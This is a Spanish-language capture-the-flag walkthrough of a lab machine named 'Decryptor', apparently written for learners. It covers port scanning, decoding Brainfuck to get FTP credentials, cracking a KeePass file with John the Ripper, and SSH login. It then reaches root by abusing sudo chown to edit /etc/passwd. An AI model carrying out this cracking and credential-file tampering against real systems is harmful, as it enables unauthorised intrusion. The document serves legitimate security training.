# Decryptor

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.83
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXg9GNzruOyH4rVZKBeCp%2Fimage.png?alt=media&#x26;token=0f0aa24c-1e01-4516-93f4-419e2254bc73" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 192.168.1.83
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FN3C0juCZVWcvi3pjpOR8%2Fimage.png?alt=media&#x26;token=e385d416-c031-4256-bc88-5e7ead2370ed" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 80** perteneciente al **servicio HTTP** y el **puerto 2121** perteneciente al **servicio FTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,2121 -v 192.168.1.83
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqeTTSQbSGUeZjMBb0qY9%2Fimage.png?alt=media&#x26;token=a2abf8d7-34b7-4c44-83c1-d2dda79d4b39" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora exploramos el servicio **HTTP**. Ingresamos la IP y nos encontramos la página de por defecto de **Apache**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F8VbYlCrbNiTYmPHiVVd7%2Fimage.png?alt=media&#x26;token=8b8253ee-a3ab-42ec-87c0-1a5b9727df25" alt=""><figcaption></figcaption></figure>

Revisando el código fuente encontramos un código en **Brainfuck**, por lo que vamos a descifrarlo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F3keKKXChUw7j9ynlbHBU%2Fimage.png?alt=media&#x26;token=a8a68781-7bb5-4976-9f2a-4f4881adf1cf" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKIYYKOwX2pZtaOQnALbJ%2Fimage.png?alt=media&#x26;token=430aa080-6761-48be-98ea-ffb0c83a1deb" alt=""><figcaption></figcaption></figure>

Probamos con el servicio FTP descubierto antes con esas supuestas credenciales.

```bash
ftp 192.168.1.83 -p 2121
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDw7Yu8VS1sqEtal4b7Qo%2Fimage.png?alt=media&#x26;token=398dd8f4-c769-42b6-ae97-7c727a31e7c0" alt=""><figcaption></figcaption></figure>

Listando encontramos un archivo llamado `user.kdbx` por lo que nos lo descargamos a nuestra máquina para echarle un vistazo.

### 🚀 **EXPLOTACIÓN**

Al abrirlo descubrimos que tiene contraseña.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F55GsDkrX3IPR6zScRCt1%2Fimage.png?alt=media&#x26;token=6cc96b3d-1238-495b-a2b0-47d44f7bf754" alt=""><figcaption></figcaption></figure>

**keepass2john** es una herramienta utilizada para convertir archivos de bases de datos de KeePass (.kdbx) a un formato compatible con herramientas de recuperación de contraseñas como **John the Ripper**. Esta conversión permite que John the Ripper procese el archivo y realice ataques de fuerza bruta u otros métodos para recuperar las contraseñas almacenadas en la base de datos de KeePass.

```bash
keepass2john user.kdbx >> hash.txt
```

Realizamos John.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBtKztMYXm3LfkKZKyFR3%2Fimage.png?alt=media&#x26;token=3e4f2158-5f9d-41d0-9d3f-3836a3671908" alt=""><figcaption></figcaption></figure>

Hemos descubierto la contraseña por lo que volvemos a entrar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FC0faEhJO8kWKpB8KVt0M%2Fimage.png?alt=media&#x26;token=81ee57da-5ae2-4411-884f-f219a2410595" alt=""><figcaption></figcaption></figure>

Descubrimos unas credenciales por lo que iniciamos sesión a través de **SSH**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHdMLNHKofsVZKXjgKEjH%2Fimage.png?alt=media&#x26;token=35d56708-e93a-4a8f-94ca-1915c59ef753" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FkpfzKv4yipKyFeRtFZ5X%2Fimage.png?alt=media&#x26;token=8a11ea2b-b617-474e-ba4f-b89b7c6f8e10" alt=""><figcaption></figcaption></figure>

Vemos que tenemos permisos sudo con **chown** por lo que miramos [GTFOBins ](https://gtfobins.github.io/gtfobins/chown/)para ver como podemos escalar privilegios. Para lograr esto, procederemos a modificar los permisos del archivo **/etc/passwd**, como se puede observar a continuación.

```bash
ls -la /etc/passwd
sudo /usr/bin/chown chiquero /etc/passwd
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FTuuGcX7NU0awMrerHefo%2Fimage.png?alt=media&#x26;token=d43fdba0-936d-4b81-826a-0df34008870c" alt=""><figcaption></figcaption></figure>

Ahora con nano quitamos los permisos.

```bash
nano /etc/passwd
cat /etc/passwd
```

Ahora restauramos los permisos a su configuración original.

```bash
sudo /usr/bin/chown root /etc/passwd
```

Comprobamos.

```bash
ls -la /etc/passwd
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FpanwoutfrzMXCQAR7qrZ%2Fimage.png?alt=media&#x26;token=b456518b-6f6a-407c-856e-04d2a8e8f191" alt=""><figcaption></figcaption></figure>

Con el comando `su` ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPYyR1sCdcjwq3qDPEzqn%2Fimage.png?alt=media&#x26;token=aec8b88f-c7de-4094-a239-5ba51a006343" alt=""><figcaption></figcaption></figure>

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
